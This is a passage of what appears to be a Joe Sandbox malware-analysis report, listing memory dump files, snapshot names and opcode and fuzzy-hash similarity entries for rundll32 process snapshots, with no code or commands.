                    • Associated: 00000013.00000002.4037835991.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037856601.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037888171.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037919205.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037948996.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037980210.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038010016.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038041302.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038074025.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038103894.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038127309.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038153160.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038181591.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038215144.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038246097.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038276865.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038380046.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038402647.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038436175.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038467761.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038497407.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038525830.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: AttributesFile$DriveInformationTypeVolume
                    • String ID: 8dC
                    • API String ID: 2660071179-998101939
                    • Opcode ID: 03753d152c315a0f9aa2bccae41360c27fd1b09a45320341c8c03d75ba66dd4c
                    • Instruction ID: 486f2d80f4d3eed2484e1266edd3e8425bc97c3940d013daab9ec3d1af7560df
                    • Opcode Fuzzy Hash: 03753d152c315a0f9aa2bccae41360c27fd1b09a45320341c8c03d75ba66dd4c
                    • Instruction Fuzzy Hash: 2F519F72205A81DDDB20DF36D8923E92B65F74578CF549026EE8987B5ACF3EC248C358
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.4037054687.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.4037020653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037054687.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037511854.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037532425.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037550515.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037569932.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037592517.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037612543.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037636218.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037659218.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037683299.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037706260.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037729580.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037752301.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037779465.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037806065.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037835991.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037856601.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037888171.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037919205.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037948996.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037980210.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038010016.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038041302.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038074025.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038103894.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038127309.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038153160.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038181591.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038215144.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038246097.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038276865.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038380046.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038402647.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038436175.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038467761.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038497407.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038525830.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: Info
                    • String ID: p.B
                    • API String ID: 1807457897-946182354
                    • Opcode ID: 22a003e79e028586990879ec0448b419a07bf0a70b4757dbf8ddc0b5b453196e
                    • Instruction ID: a55d62deaf6486fe7fa7546ebbf7f25a2866b087c327a76bd6636ebfb1b793b4
                    • Opcode Fuzzy Hash: 22a003e79e028586990879ec0448b419a07bf0a70b4757dbf8ddc0b5b453196e
                    • Instruction Fuzzy Hash: 3721E476A14B80CEDB14DF39D89029C3BA4F38478CF64511AEA4987B69CF34C596C784
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000014.00000002.2596173277.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000014.00000002.2596150975.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596173277.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596488870.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596508834.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596525083.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596541149.000000000082A000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596556886.000000000082B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596573547.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596588372.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596605017.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596622821.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596637516.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596652857.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596667564.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596684176.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596698852.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596713838.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596728931.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596745625.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596760787.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596775423.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596790020.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596804502.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596818914.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596837815.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596852080.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596867522.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596882971.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596902161.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596918950.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596936324.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596953028.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596969864.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2596969864.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2597003533.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2597021441.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2597038463.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2597055018.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2597071173.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2597090848.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2597109784.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000014.00000002.2597109784.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_20_2_400000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7a7d775f2f31171e9fdc6f9a2d88efd9136b6ab3ceaa150b0c732618665457cd
                    • Instruction ID: 43e2e41ca933135a76ff93088d0e918a0ccdcc9e2d3f64ee52f22439fc26371c
                    • Opcode Fuzzy Hash: 7a7d775f2f31171e9fdc6f9a2d88efd9136b6ab3ceaa150b0c732618665457cd
                    • Instruction Fuzzy Hash: B6F01736601A85DACB24DF36E8807D83764F75938CF50402AFA5D87B18DB34C69ACB40
                    Uniqueness

                    Uniqueness Score: -1.00%